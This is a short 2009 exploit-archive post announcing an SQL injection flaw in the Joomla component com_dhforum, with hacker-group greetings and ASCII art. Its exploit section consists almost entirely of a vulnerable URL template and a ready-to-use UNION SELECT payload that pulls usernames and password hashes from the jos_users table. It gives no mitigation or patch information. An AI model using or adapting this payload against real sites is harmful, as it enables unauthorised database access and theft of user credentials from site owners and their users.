[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_dhforum SQL Injection Vulnerability
# Published : 2009-12-27
# Author : ViRuSMaN
# Previous Title : Cybershade CMS 0.2 Remote File Inclusion Vulnerability
# Next Title : Mambo Component Material Suche 1.0 SQL injection Vulnerability
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
======
[?] Joomla Component com_dhforum SQL Injection Vulnerability
========================================================================
======
[?] Script: [ joomla Component ]
[?] Language: [ PHP ]
[?] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[?] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]
[?] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
[?] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]
===[ Live Demo ]===
[?] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat
(username,0x3a,password)+from+jos_users--
Author: ViRuSMaN <-
###########################################################################